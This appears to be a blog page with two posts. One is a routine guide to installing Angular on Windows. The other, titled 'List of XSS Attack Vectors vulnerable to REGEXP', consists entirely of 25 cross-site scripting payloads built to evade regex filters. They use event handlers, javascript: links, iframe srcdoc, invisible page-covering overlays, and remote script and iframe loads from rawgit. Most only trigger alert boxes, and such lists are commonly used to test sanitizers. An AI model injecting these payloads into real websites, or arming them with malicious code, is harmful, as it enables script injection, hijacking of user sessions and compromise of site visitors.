Saturday, February 15, 2020

How to Install Angular on Windows

Step by step instructions on How to Install Angular on Windows:

1. Download Node from https://nodejs.org/en/
2. Install Node.js from the downloaded set-up.
3. Once node is downloaded, open CMD and type in node -v and npm -v.
4. Once you get the accurate versions, install Angular CLI from https://cli.angular.io/
5. Open CMD and Run npm install -g @angular/cli
6. Update Windows environment PATH variable to point to: C:\Users\\AppData\Roaming\npm\node_modules\@angular\cli\bin
7. Download Visual Studio Code
8. Create and Open folder using VS Code.
9. Open Terminal window inside VS Code and type in ng new my-new-app
10. This will provision a new Angular app.
11. Once provisioned, type-in ng serve, this will open: http://localhost:4200/
12. The default app is  a good start for Angular development.


Saturday, February 1, 2020

List of XSS Attack Vectors vulnerable to REGEXP

<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="<script>alert('XSS - 11')</script>">
<iframe srcdoc="<script>alert('XSS - 12')</script>" />
<iframe srcdoc="<script>alert('XSS - 13')</script>"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > 
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > 
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > 
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
  
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">